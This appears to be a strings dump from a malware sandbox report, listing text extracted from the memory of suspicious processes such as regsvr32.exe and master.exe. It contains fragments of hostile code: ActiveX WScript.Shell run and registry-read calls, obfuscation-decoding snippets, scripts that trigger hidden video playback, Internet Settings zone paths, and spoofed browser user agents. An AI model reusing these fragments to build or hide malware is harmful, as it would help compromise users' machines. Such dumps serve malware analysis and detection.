Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
PSAPI.dll
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowser
IWebBrowserApp
IWebBrowserApp
IWebBrowser2
IWebBrowser2
.length;
.length;
=String.fromCharCode(parseInt(
=String.fromCharCode(parseInt(
.substr(
.substr(
,2),16));
,2),16));
=String.fromCharCode(
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt()^
,1).charCodeAt());
,1).charCodeAt());
.length-1)?
.length-1)?
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Environment("Process"))("
.Run("
.Run("
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.RegRead("
.RegRead("
psapi.dll
psapi.dll
HTTP/1.1
HTTP/1.1
\\.\LCD
\\.\LCD
1234567890
1234567890
Shell32.dll
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
0123456789
Mozilla
Mozilla
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
.text
.text
`.rdata
`.rdata
@.pdata
@.pdata
KERNEL32.dll
KERNEL32.dll
@.reloc
@.reloc
222.dll
222.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyW
RegCreateKeyA
RegCreateKeyA
version.dll
version.dll
gdi32.dll
gdi32.dll
SetProcessWindowStation
SetProcessWindowStation
OpenWindowStationA
OpenWindowStationA
EnumChildWindows
EnumChildWindows
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntry
DeleteUrlCacheEntry
ole32.dll
ole32.dll
wsock32.dll
wsock32.dll
winmm.dll
winmm.dll
atl.dll
atl.dll
wtsapi32.dll
wtsapi32.dll
Wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
PSAPI.DLL
shell32.dll
shell32.dll
ShellExecuteExW
ShellExecuteExW
NtQueryValueKey
NtQueryValueKey
NtDeleteValueKey
NtDeleteValueKey
NtSetValueKey
NtSetValueKey
urlmon.dll
urlmon.dll
UrlMkSetSessionOption
UrlMkSetSessionOption
4"4,414?4
4"4,414?4
4,41494^4
4,41494^4
6%6X6v6
6%6X6v6
6*636@6~6
6*636@6~6
>0>>>[>~>
>0>>>[>~>
6%6s6
6%6s6
67
67
7%7X7
7%7X7
3%4,41464
3%4,41464
6-676H6l6v6}6
6-676H6l6v6}6
WindowsUpdate
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
66006666
hwopt12052016001648_updater_service.exe_380_rwx_00A40000_0000C000:
o%Cyj
o%Cyj
W%Cyj!
W%Cyj!
?%Cyj"
?%Cyj"
'%Cyj#
'%Cyj#
%Cyj$
%Cyj$
regsvr32.exe_2952:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
USER32.DLL
USER32.DLL
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
PSAPI.dll
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowser
IWebBrowserApp
IWebBrowserApp
IWebBrowser2
IWebBrowser2
.length;
.length;
=String.fromCharCode(parseInt(
=String.fromCharCode(parseInt(
.substr(
.substr(
,2),16));
,2),16));
=String.fromCharCode(
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt()^
,1).charCodeAt());
,1).charCodeAt());
.length-1)?
.length-1)?
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Environment("Process"))("
.Run("
.Run("
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.RegRead("
.RegRead("
psapi.dll
psapi.dll
HTTP/1.1
HTTP/1.1
\\.\LCD
\\.\LCD
1234567890
1234567890
Shell32.dll
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
0123456789
Mozilla
Mozilla
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
.text
.text
`.rdata
`.rdata
@.pdata
@.pdata
KERNEL32.dll
KERNEL32.dll
@.reloc
@.reloc
222.dll
222.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyW
RegCreateKeyA
RegCreateKeyA
version.dll
version.dll
gdi32.dll
gdi32.dll
SetProcessWindowStation
SetProcessWindowStation
OpenWindowStationA
OpenWindowStationA
EnumChildWindows
EnumChildWindows
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntry
DeleteUrlCacheEntry
ole32.dll
ole32.dll
wsock32.dll
wsock32.dll
winmm.dll
winmm.dll
atl.dll
atl.dll
wtsapi32.dll
wtsapi32.dll
Wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
PSAPI.DLL
shell32.dll
shell32.dll
ShellExecuteExW
ShellExecuteExW
NtQueryValueKey
NtQueryValueKey
NtDeleteValueKey
NtDeleteValueKey
NtSetValueKey
NtSetValueKey
urlmon.dll
urlmon.dll
UrlMkSetSessionOption
UrlMkSetSessionOption
4"4,414?4
4"4,414?4
4,41494^4
4,41494^4
6%6X6v6
6%6X6v6
6*636@6~6
6*636@6~6
>0>>>[>~>
>0>>>[>~>
6%6s6
6%6s6
67
67
7%7X7
7%7X7
3%4,41464
3%4,41464
6-676H6l6v6}6
6-676H6l6v6}6
WindowsUpdate
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
66006666
regsvr32.exe_2952_rwx_00080000_00132000:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
USER32.DLL
USER32.DLL
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
PSAPI.dll
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowser
IWebBrowserApp
IWebBrowserApp
IWebBrowser2
IWebBrowser2
.length;
.length;
=String.fromCharCode(parseInt(
=String.fromCharCode(parseInt(
.substr(
.substr(
,2),16));
,2),16));
=String.fromCharCode(
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt()^
,1).charCodeAt());
,1).charCodeAt());
.length-1)?
.length-1)?
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Environment("Process"))("
.Run("
.Run("
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.RegRead("
.RegRead("
psapi.dll
psapi.dll
HTTP/1.1
HTTP/1.1
\\.\LCD
\\.\LCD
1234567890
1234567890
Shell32.dll
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
0123456789
Mozilla
Mozilla
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
.text
.text
`.rdata
`.rdata
@.pdata
@.pdata
KERNEL32.dll
KERNEL32.dll
@.reloc
@.reloc
222.dll
222.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyW
RegCreateKeyA
RegCreateKeyA
version.dll
version.dll
gdi32.dll
gdi32.dll
SetProcessWindowStation
SetProcessWindowStation
OpenWindowStationA
OpenWindowStationA
EnumChildWindows
EnumChildWindows
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntry
DeleteUrlCacheEntry
ole32.dll
ole32.dll
wsock32.dll
wsock32.dll
winmm.dll
winmm.dll
atl.dll
atl.dll
wtsapi32.dll
wtsapi32.dll
Wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
PSAPI.DLL
shell32.dll
shell32.dll
ShellExecuteExW
ShellExecuteExW
NtQueryValueKey
NtQueryValueKey
NtDeleteValueKey
NtDeleteValueKey
NtSetValueKey
NtSetValueKey
urlmon.dll
urlmon.dll
UrlMkSetSessionOption
UrlMkSetSessionOption
4"4,414?4
4"4,414?4
4,41494^4
4,41494^4
6%6X6v6
6%6X6v6
6*636@6~6
6*636@6~6
>0>>>[>~>
>0>>>[>~>
6%6s6
6%6s6
67
67
7%7X7
7%7X7
3%4,41464
3%4,41464
6-676H6l6v6}6
6-676H6l6v6}6
Uh.EE
Uh.EE
WindowsUpdate
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
66006666
master.exe_1488:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
actualKey
actualKey
J!"#$J%J&'()*J ,JJJJJJJJ-J.JJ/0J1JJJJJJJJJJJJJJJJJJ23JJ4567JJ8JJJJJ9:;JJJJJ?JJJJJJJJ@JJJJJJAJJJJJBJJCJJJJJJJJJJJDEJJJJJJJFJGJJJJJJJJJJJJHJI
J!"#$J%J&'()*J ,JJJJJJJJ-J.JJ/0J1JJJJJJJJJJJJJJJJJJ23JJ4567JJ8JJJJJ9:;JJJJJ?JJJJJJJJ@JJJJJJAJJJJJBJJCJJJJJJJJJJJDEJJJJJJJFJGJJJJJJJJJJJJHJI
j.hHZg
j.hHZg
?f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\strcore.cpp
?f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\strcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtempl.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtempl.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afx.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afx.inl
CACHE_S_FORMATETC_NOTSUPPORTED
CACHE_S_FORMATETC_NOTSUPPORTED
CO_E_SERVER_EXEC_FAILURE
CO_E_SERVER_EXEC_FAILURE
MK_E_INTERMEDIATEINTERFACENOTSUPPORTED
MK_E_INTERMEDIATEINTERFACENOTSUPPORTED
OLE_E_ADVISENOTSUPPORTED
OLE_E_ADVISENOTSUPPORTED
REGDB_E_KEYMISSING
REGDB_E_KEYMISSING
CACHE_E_FIRST...CACHE_E_LAST
CACHE_E_FIRST...CACHE_E_LAST
CACHE_S_FIRST...CACHE_S_LAST
CACHE_S_FIRST...CACHE_S_LAST
CLASSFACTORY_E_FIRST...CLASSFACTORY_E_LAST
CLASSFACTORY_E_FIRST...CLASSFACTORY_E_LAST
CLASSFACTORY_S_FIRST...CLASSFACTORY_S_LAST
CLASSFACTORY_S_FIRST...CLASSFACTORY_S_LAST
CLIENTSITE_E_FIRST...CLIENTSITE_E_LAST
CLIENTSITE_E_FIRST...CLIENTSITE_E_LAST
CLIENTSITE_S_FIRST...CLIENTSITE_S_LAST
CLIENTSITE_S_FIRST...CLIENTSITE_S_LAST
CLIPBRD_E_FIRST...CLIPBRD_E_LAST
CLIPBRD_E_FIRST...CLIPBRD_E_LAST
CLIPBRD_S_FIRST...CLIPBRD_S_LAST
CLIPBRD_S_FIRST...CLIPBRD_S_LAST
CONVERT10_E_FIRST...CONVERT10_E_LAST
CONVERT10_E_FIRST...CONVERT10_E_LAST
CONVERT10_S_FIRST...CONVERT10_S_LAST
CONVERT10_S_FIRST...CONVERT10_S_LAST
CO_E_FIRST...CO_E_LAST
CO_E_FIRST...CO_E_LAST
CO_S_FIRST...CO_S_LAST
CO_S_FIRST...CO_S_LAST
DATA_E_FIRST...DATA_E_LAST
DATA_E_FIRST...DATA_E_LAST
DATA_S_FIRST...DATA_S_LAST
DATA_S_FIRST...DATA_S_LAST
DRAGDROP_E_FIRST...DRAGDROP_E_LAST
DRAGDROP_E_FIRST...DRAGDROP_E_LAST
DRAGDROP_S_FIRST...DRAGDROP_S_LAST
DRAGDROP_S_FIRST...DRAGDROP_S_LAST
ENUM_E_FIRST...ENUM_E_LAST
ENUM_E_FIRST...ENUM_E_LAST
ENUM_S_FIRST...ENUM_S_LAST
ENUM_S_FIRST...ENUM_S_LAST
INPLACE_E_FIRST...INPLACE_E_LAST
INPLACE_E_FIRST...INPLACE_E_LAST
INPLACE_S_FIRST...INPLACE_S_LAST
INPLACE_S_FIRST...INPLACE_S_LAST
MARSHAL_E_FIRST...MARSHAL_E_LAST
MARSHAL_E_FIRST...MARSHAL_E_LAST
MARSHAL_S_FIRST...MARSHAL_S_LAST
MARSHAL_S_FIRST...MARSHAL_S_LAST
MK_E_FIRST...MK_E_LAST
MK_E_FIRST...MK_E_LAST
MK_S_FIRST...MK_S_LAST
MK_S_FIRST...MK_S_LAST
OLEOBJ_E_FIRST...OLEOBJ_E_LAST
OLEOBJ_E_FIRST...OLEOBJ_E_LAST
OLEOBJ_S_FIRST...OLEOBJ_S_LAST
OLEOBJ_S_FIRST...OLEOBJ_S_LAST
OLE_E_FIRST...OLE_E_LAST
OLE_E_FIRST...OLE_E_LAST
OLE_S_FIRST...OLE_S_LAST
OLE_S_FIRST...OLE_S_LAST
REGDB_E_FIRST...REGDB_E_LAST
REGDB_E_FIRST...REGDB_E_LAST
REGDB_S_FIRST...REGDB_S_LAST
REGDB_S_FIRST...REGDB_S_LAST
VIEW_E_FIRST...VIEW_E_LAST
VIEW_E_FIRST...VIEW_E_LAST
VIEW_S_FIRST...VIEW_S_LAST
VIEW_S_FIRST...VIEW_S_LAST
FACILITY_WINDOWS
FACILITY_WINDOWS
severity: %s, facility: %s ($lX)
severity: %s, facility: %s ($lX)
range: %s ($lX)
range: %s ($lX)
%s ($lX)
%s ($lX)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp
Warning: constructing COleException, scode = %s.
Warning: constructing COleException, scode = %s.
f:\dd\vctools\vc7libs\ship\atlmfc\include\cstringt.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\cstringt.h
CNotSupportedException
CNotSupportedException
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\except.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\except.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtls_.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtls_.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winstr.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winstr.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelpx.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelpx.cpp
KERNEL32.DLL
KERNEL32.DLL
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
%s%s.dll
%s%s.dll
%s (%s:%d)
%s (%s:%d)
lX-X-x-XX-XXXXXX
lX-X-x-XX-XXXXXX
m_msgCur = {
m_msgCur = {
m_pszExeName =
m_pszExeName =
m_nCmdShow =
m_nCmdShow =
m_lpCmdLine =
m_lpCmdLine =
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxadv.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxadv.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occmgr.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occmgr.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshellmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshellmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui3.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui3.cpp
RegCreateKeyTransactedA
RegCreateKeyTransactedA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcore.cpp
IGNORING command id 0xX sent to %hs dialog.
IGNORING command id 0xX sent to %hs dialog.
Routing command id 0xX to app.
Routing command id 0xX to app.
Routing command id 0xX to owner window.
Routing command id 0xX to owner window.
Warning: Creating dialog from within a COleControlModule application is not a supported scenario.
Warning: Creating dialog from within a COleControlModule application is not a supported scenario.
Warning: ExecuteDlgInit failed during dialog init.
Warning: ExecuteDlgInit failed during dialog init.
ERROR: Dialog with IDD 0xX must have the child style.
ERROR: Dialog with IDD 0xX must have the child style.
ERROR: Dialog named '%s' must have the child style.
ERROR: Dialog named '%s' must have the child style.
ERROR: Dialog with IDD 0xX must be invisible.
ERROR: Dialog with IDD 0xX must be invisible.
ERROR: Dialog named '%s' must be invisible.
ERROR: Dialog named '%s' must be invisible.
ERROR: Cannot find dialog template with IDD 0xX.
ERROR: Cannot find dialog template with IDD 0xX.
ERROR: Cannot find dialog template named '%s'.
ERROR: Cannot find dialog template named '%s'.
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcomctl32.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcomctl32.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdialogimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdialogimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
Warning: unknown WM_MEASUREITEM for menu item 0xX.
Warning: unknown WM_MEASUREITEM for menu item 0xX.
Can't register window class named %s
Can't register window class named %s
Afx:%p:%x:%p:%p:%p
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
Afx:%p:%x
user32.dll
user32.dll
WinHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.
WinHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.
